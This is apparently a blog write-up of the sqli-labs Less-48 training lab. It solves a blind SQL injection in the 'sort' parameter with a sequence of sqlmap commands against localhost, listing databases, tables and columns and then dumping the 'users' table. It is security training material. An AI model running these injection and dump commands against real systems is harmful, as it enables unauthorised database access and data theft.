sqli-labs-Less-48

heze092026-03-17 9:17

SQLI-LAPS 实验记录

Less-48

这一关是盲注,页面上没有任何反馈信息,所以我们采用sqlmap工具来帮助进行自动化注入。

首先我们在命令行中输入sqlmap命令:

sql 复制代码 
sqlmap -u http://localhost/sqli-labs/Less-48/?sort=1 --batch

结果如图所示,有两种注入方式可选,布尔盲注和时间盲注,接下来我们继续采用sqlmap自动化注入。

sql 复制代码 
sqlmap -u http://localhost/sqli-labs/Less-48/?sort=1 --batch --dbs

结果如图所示,页面返回数据库的名称,注入有效。

之后,我们可以继续使用sqlmap注入的方式,对表名、列名等内容进行注入。

  • 爆出表名:
php 复制代码 
sqlmap -u http://localhost/sqli-labs/Less-48/?sort=1 --batch -D security --tables
  • 爆出列名:
php 复制代码 
sqlmap -u http://localhost/sqli-labs/Less-48/?sort=1 --batch -D security -T users --columns
  • 爆出内容:
php 复制代码 
sqlmap -u http://localhost/sqli-labs/Less-48/?sort=1 --batch -D security -T users --dump
相关推荐
坚定信念,勇往无前2 分钟前
electron-vite 安装better-sqlite3
javascript·数据库·electron
一个在高校打杂的5 分钟前
honeypot之opencanary(轻量化蜜罐)
linux·网络安全·网络攻击模型·安全威胁分析·策略模式
大明者省6 分钟前
Ubuntu22.04 宝塔面板与 XFCE 远程桌面端口兼容性分析
运维·服务器·数据库·笔记
一个脚本boy6 分钟前
攻防世界misc简单难度1-20题详细解法
网络安全
liudanzhengxi32 分钟前
巧用ULN2003A轻松扩展单片机IO口
数据库·mongodb
Teable任意门互动39 分钟前
深度解析:AI 赋能开源多维表格,实现企业全场景数据整合与高效应用
数据库·人工智能·低代码·信息可视化·开源·数据库开发
谪星·阿凯1 小时前
Linux提权全攻略博客
linux·运维·服务器·网络安全
还是鼠鼠1 小时前
AI掘金头条新闻系统 (Toutiao News)-相关推荐
后端·python·mysql·fastapi·web
DevOpenClub1 小时前
职教高考及高职分类招生控制线 API 接口
java·数据库·高考
热门推荐
01GitHub 镜像站点02Codex 接入 DeepSeek API 完整配置文档03CC-Switch & Claude 基于 Linux 服务器安装使用指南04【踩坑记录 | 第一篇】微软商店无法使用时,如何手动安装 OpenAI Codex?附`.msix`文件系统错误解决方法05【AI】2026 年具身智能模型和世界模型总结06装上就回不去了:CodeGraph 让 AI 编程效率飙升 92%,它到底做了什么?07几个好用的ip纯净度检测网站08裂开!ChatGPT 居然开始要手机号验证,附详细解决方法09用了半年 OpenRouter,我换到了 Ofox.ai — 两个 AI API 聚合平台的真实对比10codex app每次打开重连5次Reconnecting问题解决